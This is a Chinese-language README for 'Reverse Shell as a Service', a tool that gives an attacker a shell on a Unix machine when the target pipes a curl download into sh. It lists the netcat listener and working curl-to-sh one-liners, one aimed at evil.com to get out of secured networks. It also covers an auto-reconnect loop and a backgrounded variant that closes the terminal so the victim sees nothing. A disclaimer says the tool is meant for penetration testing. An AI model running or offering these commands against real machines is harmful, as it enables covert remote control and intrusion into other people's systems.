反向Shell即服务 - https://reverse-shell.sh
一个易于记忆的反向Shell,适用于大多数类Unix系统。
它会检测目标上可用的软件,并运行合适的有效载荷。
在你的机器上打开一个端口并监听。你可以使用netcat轻松完成。
nc -l 1337
在目标机器上,将 https://reverse-shell.sh/你IP:端口 的输出通过管道传给sh。
curl https://reverse-shell.sh/192.168.0.69:1337 | sh
回到你的机器,你现在应该会得到一个Shell提示符。
本工具旨在用于渗透测试,或帮助同事理解为什么他们应该始终锁定自己的电脑。请不要将其用于任何恶意目的。
你可以使用主机名代替IP。
curl https://reverse-shell.sh/localhost:1337 | sh
由于这是反向连接,它可以穿透防火墙并连接到互联网。
你可以在一台 evil.com 服务器上监听连接,然后通过以下命令从安全网络内部获得反向Shell:
curl https://reverse-shell.sh/evil.com:1337 | sh
默认情况下,当Shell退出时,连接会断开。你可能因为执行了无效命令而意外退出。你可以通过将其包装在while循环中来轻松创建一个会尝试重新连接的Shell。
while true; do curl https://reverse-shell.sh/你IP:1337 | sh; done
如果对同事这样做,请小心:如果他们离开办公室时这个脚本还在运行,你会让他们暴露在攻击之下。
终端会话需要保持打开状态才能维持反向Shell连接。如果你试图恶搞同事,这可能会有些明显。
以下命令会在后台进程中运行反向Shell并退出终端,从而在受害者的机器上不留任何可疑的终端窗口。
请确保在一个新的终端窗口中运行此命令,否则现有会话中的工作将会丢失。
sh -c "curl https://reverse-shell.sh/localhost:1337 | sh -i &" && exit
MIT © Luke Childs